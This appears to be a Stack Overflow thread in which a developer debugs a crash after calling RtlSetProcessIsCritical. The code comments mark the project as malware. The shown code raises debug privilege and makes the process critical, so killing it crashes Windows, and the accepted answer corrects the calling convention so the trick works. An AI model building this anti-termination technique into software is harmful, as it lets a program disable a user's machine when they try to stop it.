# If RtlSetProcessIsCritical is called, comparing the commandline to a value using lstrcmpW will crash the programm

Tags: c++, winapi, visual-c++

Im working on a bigger project right now and I've run into a weird problem.
As the title states, im calling the `RtlSetProcessIsCritical` function and I than try to exectute a codeblock if the second argument from the commandline matches with a preset value using `lstrcmpW`.

**Reconstructed code from my project that projects the structer**

Main Cpp File:

```
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow) {
    int nArgs;
    LPWSTR* szArglist = CommandLineToArgvW(GetCommandLine(), &nArgs);

    // Check if ArgumentList was Created, if not: Exit Malware
    if (!szArglist) {
        MessageBox(NULL, L"Couldn't parse Commandline", L"CommandLineToArgvW", MB_OK | MB_SYSTEMMODAL | MB_ICONERROR);
        ExitProcess(EXIT_FAILURE);
    }

    if (nArgs > 1) {
        if (!lstrcmp(szArglist[1], L"/exec") {
            // Some Code here...
        } else if (!lstrcmp(szArglist[1], L"/host")) {
            // Some Code here...

            if (NTImportDLLFUNC()) {
                if (NTSetProcessIsCritical(TRUE)) {
                    // Debug Message
                    MessageBox(NULL, L"HostProcess is now Critical", L"N0T-iLLerka.X", MB_OK | MB_SYSTEMMODAL | MB_ICONWARNING);
                }
            }

            if (nArgs > 2) {
                if (!lstrcmp(szArglist[2], L"/init")) {
                    // Some Code here...
                }
            }
            // Deadlock here
        }
    }
// Some Code here...
}
```

The Utilities File:

```
#define OPTION_SHUTDOWN_SYSTEM 6
#define SE_DEBUG_PRIVILEGE 20

typedef NTSTATUS(CALLBACK* pRTLADJUSTPRIVILEGE)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
pRTLADJUSTPRIVILEGE RtlAdjustPrivilege;
typedef NTSTATUS(CALLBACK* pRTLSETPROCESSISCRITICAL)(BOOLEAN, BOOLEAN*, BOOLEAN);
pRTLSETPROCESSISCRITICAL RtlSetProcessIsCritical;

bool NTImportDLLFUNC() {
    HINSTANCE hNtdll = LoadLibrary(L"ntdll.dll");
    if (hNtdll) {
        RtlAdjustPrivilege = (pRTLADJUSTPRIVILEGE)GetProcAddress(hNtdll, "RtlAdjustPrivilege");
        if (!RtlAdjustPrivilege) {
            MessageBox(NULL, L"\"RtlAdjustPrivilege\" is invalid", L"GetProcAddress", MB_OK | MB_SYSTEMMODAL | MB_ICONERROR);
            FreeLibrary(hNtdll);
            return FALSE;
        }

        RtlSetProcessIsCritical = (pRTLSETPROCESSISCRITICAL)GetProcAddress(hNtdll, "RtlSetProcessIsCritical");
        if (!RtlSetProcessIsCritical) {
            MessageBox(NULL, L"\"RtlSetProcessIsCritical\" is invalid", L"GetProcAddress", MB_OK | MB_SYSTEMMODAL | MB_ICONERROR);
            FreeLibrary(hNtdll);
            return FALSE;
        }
    } else {
        MessageBox(NULL, L"Couldn't load \"ntdll.dll\"", L"N0T-iLLerka.X", MB_OK | MB_SYSTEMMODAL | MB_ICONERROR);
        return FALSE;
    }

    FreeLibrary(hNtdll);
    return TRUE;
}

bool NTSetProcessIsCritical(BOOLEAN blIscritical) {
    BOOLEAN bl;
    if (!RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &bl)) {
        if (!RtlSetProcessIsCritical(blIscritical, NULL, FALSE)) {
            return TRUE;
        } else {
            MessageBox(NULL, L"Couldn't set Process Critical", L"RtlSetProcessIsCritical", MB_OK | MB_SYSTEMMODAL | MB_ICONERROR);
            return FALSE;
        }
    } else {
        MessageBox(NULL, L"Couldn't set Debug Privileges", L"RtlAdjustPrivilege", MB_OK | MB_SYSTEMMODAL | MB_ICONERROR);
        return FALSE;
    }

    return FALSE;
}
```

The problem now is that when I have called the `RtlSetProcessIsCritical` (unimportant to what it get's set) and the commandlineargument get's compared the application crashes, however if I don't make a call to `RtlSetProcessIsCritical` the programm works flawlessly for whatever reason.

I've found out that the problem is between the `RtlSetProcessIsCritical` function and this line `if (!lstrcmp(szArglist[2], L"/init")) {`

I've also tried to reproduce this "bug" in a other project with the same structer of code but it worked flawlessly there and I'm now out of ideas.

If you need the rest of the code you can read it at my Github, links to the 2 files:

[Main Cpp](https://github.com/Lima-X-Coding/N0T-iLLerka.X/blob/master/Win32.N0T-iLLerka.X/N0TiLLerka/SourceFiles/N0TiLLerka.cpp)

[Utilities Cpp](https://github.com/Lima-X-Coding/N0T-iLLerka.X/blob/master/Win32.N0T-iLLerka.X/N0TiLLerka/SourceFiles/Utilities/NTUtilities.cpp)

(In the main file on my Github the call to `RtlSetProcessIsCritical` is after the if statement. This is temporery, it was just a quick workaround so I can atleast test the rest of the Software. In the release version this should be in the previously described order!)

Comment: When `NTImportDLLFUNC()` returns TRUE, you are unloading `ntdll.dll` before `RtlSetProcessIsCritical()` can be called by `NTSetProcessIsCritical()`.  Don't call `FreeLibrary()` until after you are actually done using the DLL.

Comment: You need to extract and include the [mcve] inline, two links to (possibly much more and volatile) code are not sufficient.

Comment: @Remy Lebeau
Freeing the Library does not effect the calls to the exported functions.
The handle to the Library is only used so the GetProcAddres functions knows where to locate the addresses of the exported functions, these addresses are then strored and used in NTSetProcessIsCritical().

Comment: if you link with ntdll.lib instead call `GetProcAddress` - you not got ths error. you wrong declare api - it **__cdecl** not **CALLBACK**

Comment: @RbMm __cdecl does not fix the issue but I might try to link the ntdll.lib directly and declare the functions using extern "C", but I don't think this will really change something because I know that the functions work (just not in this case)

Comment: @LimaX - so exist another errors in your code. but this api is *__cdecl* - your code is *x86* ? link with lib - not remove problem (if exist) but make code more simply.

Comment: @LimaX if you obtain a pointer to a DLL function and then unload the DLL from memory, the pointer is no longer valid to use. Your code has *Undefined Behavior*. For DLLs that are pre-loaded into processes, like `kernel32` and `ntdll`, consider using `GetModuleHandle()` instead of `LoadLibrary()`

Comment: @RemyLebeau mhh, I will take a closer look at this (I probably could just remove the FreeLibrary part, the Process dosen't get Terminated anyways)

Answer (score 1, accepted):

declaration

```
typedef NTSTATUS(CALLBACK* pRTLSETPROCESSISCRITICAL)(BOOLEAN, BOOLEAN*, BOOLEAN);
```

is wrong. correct function definition is

```
NTSYSAPI
NTSTATUS
STDAPIVCALLTYPE
RtlSetProcessIsCritical(
    _In_ BOOLEAN NewValue,
    _Out_opt_ PBOOLEAN OldValue,
    _In_ BOOLEAN CheckFlag
    );
```

this is `STDAPIVCALLTYPE` - same as `__cdecl`, not `CALLBACK` (aka `__stdcall`). this is very rare exception for ntdll api. of course for *x64* no different, so i sure your code is *x86*. as result your stack after call to `RtlSetProcessIsCritical` is wrong

as side note - you not need `LoadLibrary` and `GetProcAddress` (interesting - how you can call `GetProcAddress` without first call  and `GetProcAddress(LoadLibrary("kernel32"), "GetProcAddress")` ?) . exist *ntdll.lib* and *ntdllp.lib* - simply link with it.

Comment: Thank You!
This finaly fixed my issue.
and if I can ask from where did you get this prototype, due to it not being defined in winternl.h / wdm.h (where most of the RTL functions are defined)

also `BOOLEAN*` and `PBOOLEAN` should still be the same, right ?

Comment: @LimaX - yes, `PBOOLEAN` the same as `BOOLEAN*` - look in *ntdll.lib* (*x86*) - here it declared as `__imp__RtlSetProcessIsCritical` not as `__imp__RtlSetProcessIsCritical@12` . if want - https://github.com/mirror/processhacker/blob/master/2.x/trunk/phlib/include/ntrtl.h#L2502

Comment: @RbMm "*how you can call `GetProcAddress` without first call and `GetProcAddress(LoadLibrary("kernel32"), "GetProcAddress")` ?*" - because `kernel32` is already loaded into every running process by default, and most apps use RTLs that statically link to `kernel32` functions, like `GetProcAddress()`.  Think about it - you couldn't call `GetProcAddress(LoadLibrary("kernel32"), "GetProcAddress")` otherwise, since `LoadLibrary()` and `GetProcAddress()` exist in `kernel32`. Catch-22 if you try to use `GetProcAddress()` that way

Comment: @RemyLebeau - but *ntdll.dll* is already loaded into every running process too. if want be more strict `kernel32.dll` not loaded to all processes (*smss.exe* for example). but in usual user processes - yes,loaded.

Comment: @RbMm fine, then it makes more sense to use `GetModuleHandle()` instead of `LoadLibrary()`

Comment: @RemyLebeau - agree. `GetModuleHandle` have more sense. but i not think that this is more safe compare static link with *ntdll.lib*. if function will be removed - yes, application not start in this case. but if function will be changed (logic, signature) ? however i never view that some api was removed. some became not implemented (return this error)

Comment: @RbMm really... a file like ntrtl.h exist...
If I had only known about it earlier I wouldn't have had to deal with this BS, whatever, thanks mate :D
@RbMm yeah using `GetModuleHandle` would make more sense here, I will implement that too (and I know the code doesn't look that well right now, thats why im saying that it's under development :D)